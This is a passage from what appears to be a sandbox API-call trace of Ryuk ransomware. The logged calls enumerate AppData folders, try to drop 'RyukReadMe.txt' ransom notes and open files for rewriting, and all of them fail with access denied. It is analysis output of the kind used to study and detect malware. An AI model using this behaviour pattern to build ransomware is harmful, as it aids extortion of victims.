dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.864] GetLastError () returned 0x5 [0159.864] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.864] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.865] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.865] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.865] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.865] SetLastError (dwErrCode=0x0) [0159.865] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.865] GetLastError () returned 0x5 [0159.865] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.865] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.865] SetLastError (dwErrCode=0x0) [0159.865] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.865] GetLastError () returned 0x5 [0159.865] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.865] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.867] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.867] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.868] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms", dwFileAttributes=0x80) returned 0 [0159.868] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.868] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.868] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.868] SetLastError (dwErrCode=0x0) [0159.868] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.868] GetLastError () returned 0x5 [0159.868] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.869] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.870] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.870] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.870] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", dwFileAttributes=0x80) returned 0 [0159.871] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.871] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.871] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.871] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.872] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", dwFileAttributes=0x80) returned 0 [0159.872] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.872] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.872] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.872] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", dwFileAttributes=0x80) returned 0 [0159.873] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.873] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.873] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.873] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.874] SetLastError (dwErrCode=0x0) [0159.874] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.877] GetLastError () returned 0x5 [0159.877] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.877] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.877] SetLastError (dwErrCode=0x0) [0159.877] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.877] GetLastError () returned 0x5 [0159.877] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.877] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.878] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.878] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.878] SetLastError (dwErrCode=0x0) [0159.878] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.878] GetLastError () returned 0x5 [0159.878] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.878] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.878] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.879] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.879] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.879] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", dwFileAttributes=0x80) returned 0 [0159.879] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.879] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.880] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0159.880] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.880] SetLastError (dwErrCode=0x0) [0159.880] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.880] GetLastError () returned 0x5 [0159.880] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.880] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.880] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.880] SetLastError (dwErrCode=0x0) [0159.880] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.880] GetLastError () returned 0x5 [0159.880] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.880] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.881] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.881] SetLastError (dwErrCode=0x0) [0159.881] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.881] GetLastError () returned 0x5 [0159.881] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.881] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.881] SetLastError (dwErrCode=0x0) [0159.881] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.881] GetLastError () returned 0x5 [0159.881] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.881] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.883] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.883] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.883] SetLastError (dwErrCode=0x0) [0159.883] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.883] GetLastError () returned 0x5 [0159.883] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.883] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.883] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.883] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.883] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.884] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]", dwFileAttributes=0x80) returned 0 [0159.884] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.884] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.885] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.885] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.885] SetLastError (dwErrCode=0x0) [0159.885] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.885] GetLastError () returned 0x5 [0159.885] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.885] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.885] SetLastError (dwErrCode=0x0) [0159.885] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.885] GetLastError () returned 0x5 [0159.885] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.885] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.886] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.886] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.886] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.886] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]", dwFileAttributes=0x80) returned 0 [0159.886] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.886] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.886] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.886] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.887] SetLastError (dwErrCode=0x0) [0159.887] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.887] GetLastError () returned 0x5 [0159.887] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.887] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.887] SetLastError (dwErrCode=0x0) [0159.887] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.887] GetLastError () returned 0x5 [0159.887] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.887] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.888] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.888] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.888] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.888] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]", dwFileAttributes=0x80) returned 0 [0159.889] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.889] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.889] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.889] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.889] SetLastError (dwErrCode=0x0) [0159.889] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.890] GetLastError () returned 0x5 [0159.890] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: 